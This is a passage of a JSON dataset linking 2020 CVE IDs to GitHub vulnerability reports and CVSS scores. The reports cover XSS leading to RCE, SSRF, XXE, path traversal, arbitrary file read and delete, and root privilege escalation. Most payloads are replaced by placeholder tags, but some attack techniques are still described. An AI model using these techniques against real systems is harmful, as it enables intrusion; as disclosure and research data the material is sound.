        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-26243",
        "Issue_Url_old": "https://github.com/nanopb/nanopb/issues/615",
        "Issue_Url_new": "https://github.com/nanopb/nanopb/issues/615",
        "Repo_new": "nanopb/nanopb",
        "Issue_Created_At": "2020-11-24T17:26:04Z",
        "description": "Memory leak when parsing a protobuf message with duplicate fields. Hello, While fuzzing a project that relies on Nanopb to parse (untrusted) user input, I found a memory leak which is triggered by sending some message where fields are duplicated. Steps to reproduce the issue In order to test this memleak on several versions of Nanopb (and several Linux distributions), I have written the following script: ERRORTAG What happens? On a up to date Debian NUMBERTAG machine, this leads to the following output: ERRORTAG With my program, APITAG leaks NUMBERTAG bytes, APITAG leaks NUMBERTAG bytes, etc. What should happen? I believe that parsing untrusted input should not leak allocated memory. You might disagree with this belief, in which case it would be nice to indicate in URLTAG that Nanopb may leak memory when parsing untrusted data which was maliciously crafted.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-26256",
        "Issue_Url_old": "https://github.com/C2FO/fast-csv/issues/540",
        "Issue_Url_new": "https://github.com/c2fo/fast-csv/issues/540",
        "Repo_new": "c2fo/fast-csv",
        "Issue_Created_At": "2020-11-30T14:21:13Z",
        "description": "Security Issue: Request for contact. Hello, The FILETAG has found a potential vulnerability in your project. Please create a Security Advisory URLTAG and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a Security Policy URLTAG containing a security email address to send the details to. Kind regards, A",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-26284",
        "Issue_Url_old": "https://github.com/golang/go/issues/38736",
        "Issue_Url_new": "https://github.com/golang/go/issues/38736",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2020-04-29T00:09:12Z",
        "description": "Unsecure path search in os/exec. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG windows/amd NUMBERTAG APITAG Originally noticed with Go NUMBERTAG though. Does this issue reproduce with the latest release? Yes What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env set GO NUMBERTAG MODULE= set GOARCH=amd NUMBERTAG set GOBIN= set PATHTAG set PATHTAG set FILETAG set GOFLAGS= set GOHOSTARCH=amd NUMBERTAG set GOHOSTOS=windows set GOINSECURE= set GONOPROXY= set GONOSUMDB= set GOOS=windows set PATHTAG set GOPRIVATE= set GOPROXY= URLTAG set GOROOT=C:\\Go set APITAG set GOTMPDIR= set PATHTAG set GCCGO=gccgo set AR=ar set CC=gcc set CXX=g++ set CGO_ENABLED NUMBERTAG set GOMOD= set CGO_CFLAGS= g O2 set CGO_CPPFLAGS= set CGO_CXXFLAGS= g O2 set CGO_FFLAGS= g O2 set CGO_LDFLAGS= g O2 set PKG_CONFIG=pkg config set GOGCCFLAGS= m NUMBERTAG mthreads fno caret diagnostics Qunused arguments fmessage length NUMBERTAG PATHTAG gno record gcc switches APITAG APITAG What did you do? APITAG Copy PATHTAG to the following program\u2019s directory as \u201c FILETAG \u201d and then run the program: APITAG package main import ( \"fmt\" \"os\" \"os/exec\" ) func APITAG { APITAG APITAG ) cmd := APITAG out, err := APITAG if err != nil { panic(err) } APITAG } APITAG What did you expect to see? The output of PATHTAG What did you see instead? The output of FILETAG (my username, since it is a copy of APITAG If the renamed copy of systeminfo.exe is removed from the test program\u2019s directory, then the output of PATHTAG is displayed as expected. Analysis PATHTAG contains the following: APITAG func APITAG string) (string, error) { \u2026 if APITAG APITAG ) { if f, err := APITAG exts); err == nil { return f, nil } else { return \"\", ERRORTAG err} } } if f, err := APITAG file), exts); err == nil { return f, nil } APITAG If the value of \u2018file\u2019 is an absolute or relative path, a result is returned. The concern is with a value which is only a name, such as APITAG One would expect this to search the list of paths found in the PATH environment variable, but before doing so the code explicitly searches the current working directory (\u201c.\u201d). There does not appear to be any means provided to disable this behavior and search only PATH. I would guess that the intent was to mimic the behavior of the FILETAG command shell, which searches the current directory first even if it is not specified in PATH. By comparison, the documentation for the Windows APITAG API indicates that it does not search PATH at all, but will use the current directory to complete a partial path. APITAG APITAG API offers an alternative, though also flawed, option to search the current directory last.) The problem is that it is not possible to use APITAG and thus APITAG to search the system PATH without searching the current directory. Thus even if diligence is taken to have the program set a secure PATH value, the programmer must be aware of this behavior and avoid using these standard library functions. The documentation of APITAG does not mention the current directory, stating only that it searches \u201cthe directories named by the PATH environment variable.\u201d Suggestions My preferred recommendation would be to remove the explicit search of \u201c.\u201d (the second if clause shown above), in order to provide the best level of security and comply with the documentation. A programmer can add \u201c.\u201d to the PATH environment variable value if the behavior is desired, as one would do in a linux/unix program. If the resulting change in Go behavior/compatibility is not desirable, a workaround could be for APITAG to reference the APITAG environment variable and avoid searching \u201c.\u201d if it is set. This is a workaround which Microsoft apparently added in Vista to disable the behavior in FILETAG . cc MENTIONTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.5,
        "impactScore": 6.0,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-26287",
        "Issue_Url_old": "https://github.com/hackmdio/codimd/issues/1630",
        "Issue_Url_new": "https://github.com/hackmdio/codimd/issues/1630",
        "Repo_new": "hackmdio/codimd",
        "Issue_Created_At": "2020-12-20T21:27:54Z",
        "description": "Stored XSS in mermaid. Hi, This weekend I played hxpctf, during competition there was a challenge called hackme. It was a Docker with codimd. My solution was unintended: I use google analytics to exploit a stored xss bug in mermaid. Here is my FILETAG The bug seems to be known by the mermaid developers ( issue URLTAG . I tryed it on FILETAG and it works, too. Hope you can fix soon! P.S. Now I'm going to reopen the issue in mermaid repository Thanks Alessandro Mizzaro",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.7,
        "impactScore": 5.8,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-26296",
        "Issue_Url_old": "https://github.com/vega/vega/issues/3018",
        "Issue_Url_new": "https://github.com/vega/vega/issues/3018",
        "Repo_new": "vega/vega",
        "Issue_Created_At": "2020-12-21T10:54:25Z",
        "description": "XSS in transform filter. This was found during the hxp ctf. Credit MENTIONTAG and his writeup URLTAG Describe how to reproduce the bug / the goal of the feature request: Paste the below JSON in the Vega Editor URLTAG . Working demo. URLTAG You will see a NUMBERTAG alert dialog. To my understanding you should not be able to run arbitrary JS using vega lite json, should you? Provide an example spec in JSON, wrapped by triple backticks like this: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.7,
        "impactScore": 5.8,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-26299",
        "Issue_Url_old": "https://github.com/autovance/ftp-srv/issues/225",
        "Issue_Url_new": "https://github.com/autovance/ftp-srv/issues/225",
        "Repo_new": "autovance/ftp-srv",
        "Issue_Created_At": "2020-12-15T23:33:06Z",
        "description": "Root escape thru symlink. You can escape root if there is a symlink withing the FTP, so creating a symlink inside the root such as APITAG will allow you to access the server root",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 5.8,
        "exploitabilityScore": 3.1
    },
    {
        "CVE_ID": "CVE-2020-26299",
        "Issue_Url_old": "https://github.com/autovance/ftp-srv/issues/167",
        "Issue_Url_new": "https://github.com/quorumdms/ftp-srv/issues/167",
        "Repo_new": "quorumdms/ftp-srv",
        "Issue_Created_At": "2019-07-17T12:56:53Z",
        "description": "User can escape from root directory. Windows, default File System, root directory set in login event callback. User can browse parent directory using PATHTAG in URL. Example: APITAG URL APITAG becomes a command APITAG At line NUMBERTAG in FILETAG we have APITAG So APITAG returns APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 5.8,
        "exploitabilityScore": 3.1
    },
    {
        "CVE_ID": "CVE-2020-26566",
        "Issue_Url_old": "https://github.com/Motion-Project/motion/issues/1227",
        "Issue_Url_new": "https://github.com/motion-project/motion/issues/1227",
        "Repo_new": "motion-project/motion",
        "Issue_Created_At": "2020-10-20T11:12:34Z",
        "description": "Could not supply a percent symbol for webcontrol param update. There is no way to put a percent symbol as param value, for example, APITAG : ERRORTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-26649",
        "Issue_Url_old": "https://github.com/Drunyacoder/AtomXCMS-2/issues/19",
        "Issue_Url_new": "https://github.com/drunyacoder/atomxcms-2/issues/19",
        "Repo_new": "drunyacoder/atomxcms-2",
        "Issue_Created_At": "2020-09-27T00:32:06Z",
        "description": "APITAG NUMBERTAG FILETAG Arbitarily File Delete Vulnerability. In FILETAG FILETAG There is no detection for input data,so we can delete anything. Payload: FILETAG FILETAG This vulnerability can delete installed detection doucument,hack can reinstall your website.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-26650",
        "Issue_Url_old": "https://github.com/Drunyacoder/AtomXCMS-2/issues/20",
        "Issue_Url_new": "https://github.com/drunyacoder/atomxcms-2/issues/20",
        "Repo_new": "drunyacoder/atomxcms-2",
        "Issue_Created_At": "2020-09-27T00:42:50Z",
        "description": "FILETAG Arbitarily File Read Vulnerability. In admin/dump.php FILETAG Ther is no detection for input,we can use php://filter with base NUMBERTAG encode to read .php or other files. payload: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-26682",
        "Issue_Url_old": "https://github.com/libass/libass/issues/431",
        "Issue_Url_new": "https://github.com/libass/libass/issues/431",
        "Repo_new": "libass/libass",
        "Issue_Created_At": "2020-09-26T13:22:12Z",
        "description": "Bug in APITAG APITAG APITAG , APITAG , const APITAG , int, int, int): Assertion ERRORTAG rad >= eps' failed. Program received signal SIGABRT, Aborted NUMBERTAG ffff6efa NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG (gdb) t APITAG thread is NUMBERTAG APITAG NUMBERTAG ffff7fdb NUMBERTAG LWP NUMBERTAG gdb) bt NUMBERTAG ffff6efa NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff6efc NUMBERTAG a in __GI_abort () at APITAG NUMBERTAG ffff6ef2bd7 in __assert_fail_base (fmt=<optimized out>, APITAG APITAG \"rad >= eps\", file=file APITAG APITAG \"ass_outline.c\", line=line APITAG APITAG APITAG APITAG APITAG , APITAG , const APITAG , int, int, int)\") at APITAG NUMBERTAG ffff6ef2c NUMBERTAG in __GI___assert_fail (assertion NUMBERTAG d NUMBERTAG APITAG \"rad >= eps\", file NUMBERTAG d NUMBERTAG APITAG \"ass_outline.c\", line NUMBERTAG function NUMBERTAG d NUMBERTAG APITAG APITAG APITAG , APITAG , const APITAG , int, int, int)\") at APITAG NUMBERTAG f in outline_stroke () at APITAG NUMBERTAG de NUMBERTAG in ass_outline_construct () at APITAG NUMBERTAG d in ass_cache_get () at ass_cache.c: ERRORTAG NUMBERTAG f2bb8 in get_bitmap_glyph () at APITAG NUMBERTAG ed5db in render_and_combine_glyphs () at APITAG NUMBERTAG e NUMBERTAG e9 in ass_render_event () at APITAG NUMBERTAG e NUMBERTAG d7 in ass_render_frame () at APITAG NUMBERTAG cc NUMBERTAG d in APITAG () at APITAG NUMBERTAG ccf5f in APITAG () at PATHTAG NUMBERTAG main () at PATHTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-26705",
        "Issue_Url_old": "https://github.com/darkfoxprime/python-easy_xml/issues/1",
        "Issue_Url_new": "https://github.com/darkfoxprime/python-easy_xml/issues/1",
        "Repo_new": "darkfoxprime/python-easy_xml",
        "Issue_Created_At": "2020-10-01T14:29:02Z",
        "description": "XML External Entity Injection (XXE). The APITAG functionality is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. URLTAG Steps: We can inject a malicious external entity into the XML(xmldoc in the below line of code). APITAG Please contact me for the POC if required. Thanks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-26707",
        "Issue_Url_old": "https://github.com/shenzhim/aaptjs/issues/2",
        "Issue_Url_new": "https://github.com/shenzhim/aaptjs/issues/2",
        "Repo_new": "shenzhim/aaptjs",
        "Issue_Created_At": "2020-10-02T12:51:33Z",
        "description": "Remote Code Execution(RCE) via insecure command formatting. It fails to restrict the arbitrary commands in the user input which results in the execution of APITAG APITAG URLTAG Raised the same issue in Hackerone as well with POC.: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-26768",
        "Issue_Url_old": "https://github.com/Formstone/Formstone/issues/286",
        "Issue_Url_new": "https://github.com/formstone/formstone/issues/286",
        "Repo_new": "formstone/formstone",
        "Issue_Created_At": "2020-10-02T22:56:01Z",
        "description": "XSS Vulnerability. Hi Formstone team. We are BRZTEC, a offensive information security firm from Brazil. When performed a pentest in one of our customers we found a XSS vulnerability that affect default installation of Formstone. Please, do you can tell us a secure channel to send to yours more details about this vulnerability? Please visit the website CVETAG and see more details on how to request a CVE ID and please acknowledge the finding to our company. If you have any difficulties let us help you. Best Regards. Adriano Monteiro Information Security Specialist EMAILTAG NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-26772",
        "Issue_Url_old": "https://github.com/george518/PPGo_Job/issues/56",
        "Issue_Url_new": "https://github.com/george518/ppgo_job/issues/56",
        "Repo_new": "george518/ppgo_job",
        "Issue_Created_At": "2020-10-06T05:16:08Z",
        "description": "There is a RCE vulnerability when run agent. when agent is running\uff0cwe can send special tcp data flow to agent\uff0cthen it will execute any cmd without any limit // use agent ip and port ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-26800",
        "Issue_Url_old": "https://github.com/ethereum/aleth/issues/5917",
        "Issue_Url_new": "https://github.com/ethereum/aleth/issues/5917",
        "Repo_new": "ethereum/aleth",
        "Issue_Created_At": "2021-01-10T22:07:33Z",
        "description": "Stack based buffer overflow while parsing JSON file. Short description Stack based buffer overflow while parsing JSON file Leads to APITAG Attack scenario An attacker can supply a specially crafted FILETAG file, consisting of NUMBERTAG left square brackets or more, which results in segmentation fault by the application. This immediately results in Denial of Service, and with more advanced exploitation it can have further implications, with higher severity security issues. Components Aleth NUMBERTAG Reproduction Create a .json file consisting of NUMBERTAG left square brackets ([) or more. Run it using the following command; \"./aleth\u00a0 config \" followed by the .json file created earlier. The stack overflow can be examined with gdb (\"set args config . APITAG or with valgrind (\"valgrind ./aleth\u00a0 config . APITAG I submitted this bug in the bug bounty program in Oct NUMBERTAG but that kind of vulnerabilities are out of scope. As there was no intention to publish the vulnerability and issue a fix after NUMBERTAG months I responsibly disclose the vulnerability with the intention to help the security team to fix the issue or mark the application as EOL if that's the case. As I didn't manage to properly compile the app with my fuzzers compiler I could use some insights on where the parser of the config file is. In any case, I would be happy to help and assist with the issue.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-26880",
        "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/943",
        "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/943",
        "Repo_new": "sympa-community/sympa",
        "Issue_Created_At": "2020-05-24T08:01:47Z",
        "description": "FILETAG will be published. [ ] Prepare pull request will merge it soon. [ ] New version of Sympa and a patch will be released.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-26880",
        "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/1009",
        "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/1009",
        "Repo_new": "sympa-community/sympa",
        "Issue_Created_At": "2020-10-07T15:31:58Z",
        "description": "root privilege escalation from user sympa by modifying APITAG Version any Installation method any Expected behavior user 'sympa' only execute specific tasks as root and cannot gain more privileges, following the principles of privileges separation Actual behavior user 'sympa' can obtain full root shell access Additional information Following up on URLTAG > A more concrete vulnerability you document in your patch, is that APITAG (as well as its entire directory) is owned by user 'sympa', so an attacker who compromised [the 'sympa' user] can directly edit the main APITAG and escalate to root. Given that the configuration file is parsed as root through the setuid sympa_newaliases wrapper, and can execute arbitrary commands through its backticks syntax, there is an unintentional privilege escalation from sympa to full root shell access. The information is public in the aforementioned thread hence this bug introduce no confidential information and is reported publicly as well. APITAG also allows for CVE assignment for small projects without a CNA able to run a full embargo procedure.) Mitigations include replacing sympa_newaliases wrapper by an alternate alias manager, see e.g. URLTAG . Credits goes to MENTIONTAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-26947",
        "Issue_Url_old": "https://github.com/monero-project/monero-gui/issues/3142",
        "Issue_Url_new": "https://github.com/monero-project/monero-gui/issues/3142",
        "Repo_new": "monero-project/monero-gui",
        "Issue_Created_At": "2020-10-08T19:18:38Z",
        "description": "fatal error: APITAG No such file or directory. My build failed with an error related to APITAG ERRORTAG In the code base I found a reference to APITAG URLTAG but that file doesn't exist.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-27155",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6637",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6637",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-10-20T23:16:44Z",
        "description": "APITAG polling endpoint can allow untrusted connections. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . x] I have raised a CVE according to our [CVE process URLTAG x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description If configured, the APITAG polling endpoint URLTAG can allow untrusted connections to be made under certain conditions. This endpoint is _not_ enabled by default. This issue does not affect Octopus Servers running on Linux, as the APITAG polling endpoint is not available. Affected versions Octopus Server NUMBERTAG to NUMBERTAG Mitigation Upgrade to the latest available supported version of Octopus Server. Workarounds Disable APITAG endpoint Use the following commands to disable the APITAG endpoint. CODETAG Links CVE: CVETAG URLTAG Internal Issue: URLTAG PR: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-27155",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6639",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6639",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-10-20T23:49:24Z",
        "description": "APITAG polling endpoint can allow untrusted connections. Tips for success NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-27155",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6640",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6640",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-10-20T23:51:07Z",
        "description": "APITAG polling endpoint can allow untrusted connections NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-27173",
        "Issue_Url_old": "https://github.com/rust-vmm/vm-superio/issues/17",
        "Issue_Url_new": "https://github.com/rust-vmm/vm-superio/issues/17",
        "Repo_new": "rust-vmm/vm-superio",
        "Issue_Created_At": "2020-10-14T07:54:28Z",
        "description": "Implementation of the serial console may allocate an unbounded amount of memory. We have identified a possible APITAG issue in rust vmm/vm superio NUMBERTAG Issue Description The rust vmm/vm superio implementation of the serial console which emulates a UART port type NUMBERTAG A allows buffering an unlimited number of bytes from input sources when using the FIFO functionality. This issue can not be triggered from the guest side. This issue presents no impact to AWS Services. Impact All VMMs that are using the FIFO functionality to forward host side input from an untrusted source to the guest can be subject to a APITAG issue. This issue cannot be triggered from serial output generated by the guest. When no rate limiting is in place, the host can be subject to memory pressure, impacting all other VMs running on the same host. Rate limiting the input from the host side also mitigates the issue. Affected Systems rust vmm/vm superio NUMBERTAG Proposed Mitigation Impact can be mitigated by upgrading to vm superio NUMBERTAG configuring memory limits to the process that is using vm superio, or by rate limiting the writes to the process standard input.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-27174",
        "Issue_Url_old": "https://github.com/firecracker-microvm/firecracker/issues/2177",
        "Issue_Url_new": "https://github.com/firecracker-microvm/firecracker/issues/2177",
        "Repo_new": "firecracker-microvm/firecracker",
        "Issue_Created_At": "2020-10-14T09:38:36Z",
        "description": "Firecracker serial console emulation may allocate an unbounded amount of memory. We have identified an issue in the Firecracker serial console emulation of all Firecracker versions up to NUMBERTAG and Firecracker NUMBERTAG Issue Description The Firecracker implementation of the serial console emulation allows buffering of an unlimited number of bytes when data is written to the Firecracker process standard input at a high rate. Impact Firecracker customers that forward the standard input of the Firecracker process to untrusted users can become subject to APITAG attacks. If memory limits are not imposed on the Firecracker process, this might impair other APITAG on the same host from allocating memory, potentially becoming an availability issue. Serial output generated by the guest can\u2019t trigger the issue. Affected Systems Firecracker versions NUMBERTAG and NUMBERTAG while all older releases might be impacted. Mitigation Impact can be mitigated by applying memory limits to the Firecracker process or by applying a rate limit when writing to the Firecracker process standard input.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-27176",
        "Issue_Url_old": "https://github.com/marktext/marktext/issues/2360",
        "Issue_Url_new": "https://github.com/marktext/marktext/issues/2360",
        "Repo_new": "marktext/marktext",
        "Issue_Created_At": "2020-10-15T02:44:28Z",
        "description": "Mutation XSS to RCE in APITAG Description There's a Cross Site Scripting (mutation XSS) that leads to Remote Code Execution (RCE) in APITAG NUMBERTAG Tested under Linux, have little doubt that the same issue is present in releases for all other platforms. Steps to reproduce NUMBERTAG Either create an .md file from scratch or in the \"source code mode\" add the following (without the backticks): ERRORTAG NUMBERTAG Either open the newly created file in APITAG or get back into the regular, main view mode NUMBERTAG Observe a popup with text APITAG Research\". Expected behavior: The APITAG is rendered as data, not executable code. Actual behavior: The APITAG is executed as code. Versions Mark Text version NUMBERTAG Operating system: presumably all, APITAG crafted for Linux. Notes This mutation XSS is possible due to the outdated APITAG library version. The XSS leads to RCE, as typical to Electron environments. To pop the calc in e.g. Gnome use the following payload: ERRORTAG The base NUMBERTAG encoded chunk is APITAG specific, but trivially adaptable to Windows or APITAG APITAG FILETAG Remediation The issue is caused (a) because of the outdated APITAG dependency, (b) more broadly, because HTML parsing is allowed. APITAG is a great piece of work, however various bypasses are naturally found every now and then. This means that APITAG always needs to stay on the bleeding edge to avoid similar issues. It may prove more scalable if the approach to avoiding Cross Site Scripting was more complex and in depth. As a short term fix, bumping up APITAG should help. CVSS NUMBERTAG I propose this CVSS vector FILETAG Thanks, Mark Art at Havoc Research.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-27195",
        "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/9129",
        "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/9129",
        "Repo_new": "hashicorp/nomad",
        "Issue_Created_At": "2020-10-20T17:41:09Z",
        "description": "(placeholder).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-27197",
        "Issue_Url_old": "https://github.com/TAXIIProject/libtaxii/issues/246",
        "Issue_Url_new": "https://github.com/taxiiproject/libtaxii/issues/246",
        "Repo_new": "taxiiproject/libtaxii",
        "Issue_Created_At": "2020-10-14T11:12:52Z",
        "description": "Blind SSRF vulnerability. When the content that starts with APITAG is passed to libtaxii's parse method, the library executes HTTP GET request, even though APITAG is set to True on the XML parser Executing ERRORTAG will trigger a GET request to ERRORTAG from URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-27197",
        "Issue_Url_old": "https://github.com/eclecticiq/OpenTAXII/issues/176",
        "Issue_Url_new": "https://github.com/eclecticiq/opentaxii/issues/176",
        "Repo_new": "eclecticiq/opentaxii",
        "Issue_Created_At": "2020-10-14T10:30:34Z",
        "description": "Blind SSRF in APITAG Hi, I and my colleague APITAG Kota) were testing the opentaxii locally deployed instance and found that it is vulnerable to SSRF issue which can be exploited by adding URLTAG xml data> Sample POC: POST /services/discovery HTTP NUMBERTAG Host: APITAG Connection: close Accept Encoding: gzip, deflate Accept: application/xml User Agent: Cabby NUMBERTAG TAXII Accept: APITAG X TAXII Services: APITAG X TAXII Content Type: APITAG X TAXII Protocol: APITAG Content Type: application/xml Content Length NUMBERTAG FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-27216",
        "Issue_Url_old": "https://github.com/eclipse/jetty.project/issues/5451",
        "Issue_Url_new": "https://github.com/eclipse/jetty.project/issues/5451",
        "Repo_new": "eclipse/jetty.project",
        "Issue_Created_At": "2020-10-15T19:44:57Z",
